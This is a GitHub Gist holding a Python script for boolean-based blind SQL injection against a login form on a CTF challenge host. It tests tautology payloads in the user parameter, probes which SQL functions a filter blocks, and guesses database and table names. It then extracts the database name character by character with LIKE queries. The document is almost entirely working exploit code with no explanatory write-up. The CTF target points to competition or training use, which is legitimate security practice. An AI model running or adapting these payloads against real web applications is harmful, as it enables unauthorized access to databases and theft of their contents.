Created
July 18, 2025 18:51
-
-
Save RajChowdhury240/7118f846c7117b4692e015d6b679a45d to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import string | |
| import time | |
| # Target URL | |
| BASE_URL = "https://filteredout.ctf.yogosha.com/" | |
| # Common database names to try first | |
| COMMON_DB_NAMES = [ | |
| 'ctf', 'challenge', 'test', 'db', 'main', 'mysql', 'users', 'app', | |
| 'web', 'site', 'data', 'admin', 'root', 'flag', 'flags', 'database', | |
| 'temp', 'demo', 'sample', 'public', 'default', 'local', 'dev' | |
| ] | |
| def make_request(user_param, pass_param="a"): | |
| """Make a request to the target URL""" | |
| params = { | |
| 'user': user_param, | |
| 'pass': pass_param | |
| } | |
| try: | |
| response = requests.get(BASE_URL, params=params, timeout=10) | |
| return response.text | |
| except requests.RequestException as e: | |
| print(f"Request failed: {e}") | |
| return None | |
| def test_basic_injection(): | |
| """Test if basic injection works""" | |
| print("[+] Testing basic injection...") | |
| payload = "admin'or'1'='1'or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print("[+] Basic injection works!") | |
| return True | |
| else: | |
| print("[-] Basic injection failed") | |
| return False | |
| def test_database_function(): | |
| """Test if database() function is accessible""" | |
| print("[+] Testing database() function...") | |
| payload = "admin'or(database())='test'or'" | |
| response = make_request(payload) | |
| if response and "forbidden" in response: | |
| print("[-] database() function is blocked") | |
| return False | |
| else: | |
| print("[+] database() function might work") | |
| return True | |
| def test_alternative_methods(): | |
| """Test alternative methods to access database info""" | |
| print("[+] Testing alternative database extraction methods...") | |
| # Test different ways to access database info | |
| methods = [ | |
| ("@@database", "admin'or(@@database)='test'or'"), | |
| ("schema()", "admin'or(schema())='test'or'"), | |
| ("current_database()", "admin'or(current_database())='test'or'"), | |
| ("user()", "admin'or(user())like('%@%')or'"), | |
| ("version()", "admin'or(version())like('%')or'"), | |
| ("@@version", "admin'or(@@version)like('%')or'"), | |
| ("@@hostname", "admin'or(@@hostname)like('%')or'"), | |
| ("@@port", "admin'or(@@port)>0or'"), | |
| ] | |
| working_methods = [] | |
| for method_name, payload in methods: | |
| print(f"[*] Testing: {method_name}") | |
| response = make_request(payload) | |
| if response and "forbidden" not in response: | |
| if "welcome" in response: | |
| print(f"[+] {method_name} works and condition is true") | |
| working_methods.append((method_name, payload, True)) | |
| else: | |
| print(f"[+] {method_name} accessible but condition false") | |
| working_methods.append((method_name, payload, False)) | |
| else: | |
| print(f"[-] {method_name} blocked") | |
| time.sleep(0.3) | |
| return working_methods | |
| def try_common_db_names(): | |
| """Try common database names""" | |
| print("[+] Trying common database names...") | |
| for db_name in COMMON_DB_NAMES: | |
| print(f"[*] Trying: {db_name}") | |
| # Try with database() function | |
| payload = f"admin'or(database())='{db_name}'or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] Found database name: {db_name}") | |
| return db_name | |
| # Try with @@database | |
| payload = f"admin'or(@@database)='{db_name}'or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] Found database name: {db_name}") | |
| return db_name | |
| time.sleep(0.5) # Be nice to the server | |
| print("[-] No common database names found") | |
| return None | |
| def try_table_names(): | |
| """Try to extract information from table names""" | |
| print("[+] Trying to access table information...") | |
| # Common table names | |
| table_names = [ | |
| 'users', 'user', 'admin', 'accounts', 'members', 'login', | |
| 'auth', 'authentication', 'profile', 'info', 'data', 'flag', | |
| 'flags', 'secret', 'config', 'settings', 'test' | |
| ] | |
| found_tables = [] | |
| for table in table_names: | |
| # Try to see if table exists | |
| payload = f"admin'or(select(1)from({table}))or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] Found table: {table}") | |
| found_tables.append(table) | |
| elif response and "forbidden" not in response: | |
| print(f"[*] Table {table} might exist but query failed") | |
| time.sleep(0.3) | |
| return found_tables | |
| def extract_with_alternative_methods(working_methods): | |
| """Extract database name using alternative methods""" | |
| print("[+] Extracting database name with alternative methods...") | |
| for method_name, base_payload, works in working_methods: | |
| if not works: | |
| continue | |
| print(f"[+] Using method: {method_name}") | |
| # Try common names first | |
| for db_name in COMMON_DB_NAMES: | |
| if method_name == "@@database": | |
| payload = f"admin'or(@@database)='{db_name}'or'" | |
| elif method_name == "schema()": | |
| payload = f"admin'or(schema())='{db_name}'or'" | |
| elif method_name == "current_database()": | |
| payload = f"admin'or(current_database())='{db_name}'or'" | |
| else: | |
| continue | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] Found database name using {method_name}: {db_name}") | |
| return db_name | |
| time.sleep(0.3) | |
| return None | |
| def extract_db_name_char_by_char(): | |
| """Extract database name character by character""" | |
| print("[+] Extracting database name character by character...") | |
| db_name = "" | |
| position = 1 | |
| while position <= 20: # Assume max 20 characters | |
| found_char = False | |
| # Try all printable characters | |
| for char in string.ascii_letters + string.digits + "_-": | |
| payload = f"admin'or(database())like('{db_name + char}%')or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| db_name += char | |
| print(f"[+] Found character: {char} (position {position})") | |
| print(f"[+] Current database name: {db_name}") | |
| found_char = True | |
| break | |
| time.sleep(0.1) # Small delay | |
| if not found_char: | |
| print(f"[+] Database name extraction complete: {db_name}") | |
| break | |
| position += 1 | |
| # Check if we've found the complete name | |
| payload = f"admin'or(database())='{db_name}'or'" | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] Confirmed complete database name: {db_name}") | |
| break | |
| return db_name | |
| def main(): | |
| print("=== SQL Injection Database Name Extractor ===") | |
| print(f"Target: {BASE_URL}") | |
| print() | |
| # Test basic injection | |
| if not test_basic_injection(): | |
| print("[-] Exiting: Basic injection failed") | |
| return | |
| # Test database() function | |
| db_function_works = test_database_function() | |
| # Test alternative methods | |
| working_methods = test_alternative_methods() | |
| # Try common database names first | |
| db_name = try_common_db_names() | |
| if db_name: | |
| print(f"[+] SUCCESS! Database name found: {db_name}") | |
| return | |
| # Try alternative methods if we found any | |
| if working_methods: | |
| db_name = extract_with_alternative_methods(working_methods) | |
| if db_name: | |
| print(f"[+] SUCCESS! Database name found: {db_name}") | |
| return | |
| # Try to find table names | |
| print("[+] Attempting to find table information...") | |
| tables = try_table_names() | |
| if tables: | |
| print(f"[+] Found tables: {tables}") | |
| print("[+] This might give clues about the database structure") | |
| # If common names failed, try character-by-character extraction | |
| if db_function_works: | |
| print("[+] Attempting character-by-character extraction...") | |
| db_name = extract_db_name_char_by_char() | |
| if db_name: | |
| print(f"[+] SUCCESS! Database name extracted: {db_name}") | |
| else: | |
| print("[-] Failed to extract database name") | |
| else: | |
| print("[-] Cannot extract database name - function blocked") | |
| # Final attempt with broader character extraction | |
| print("[+] Final attempt: Trying to extract any useful information...") | |
| # Try to get some information about the environment | |
| info_payloads = [ | |
| ("Test if we can access any functions", "admin'or(1)=(1)or'"), | |
| ("Test basic math", "admin'or(1+1)=(2)or'"), | |
| ("Test string operations", "admin'or('a')=('a')or'"), | |
| ] | |
| for desc, payload in info_payloads: | |
| response = make_request(payload) | |
| if response and "welcome" in response: | |
| print(f"[+] {desc}: SUCCESS") | |
| else: | |
| print(f"[-] {desc}: FAILED") | |
| time.sleep(0.2) | |
| if __name__ == "__main__": | |
| main() |
Author
RajChowdhury240
commented
Jul 18, 2025
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment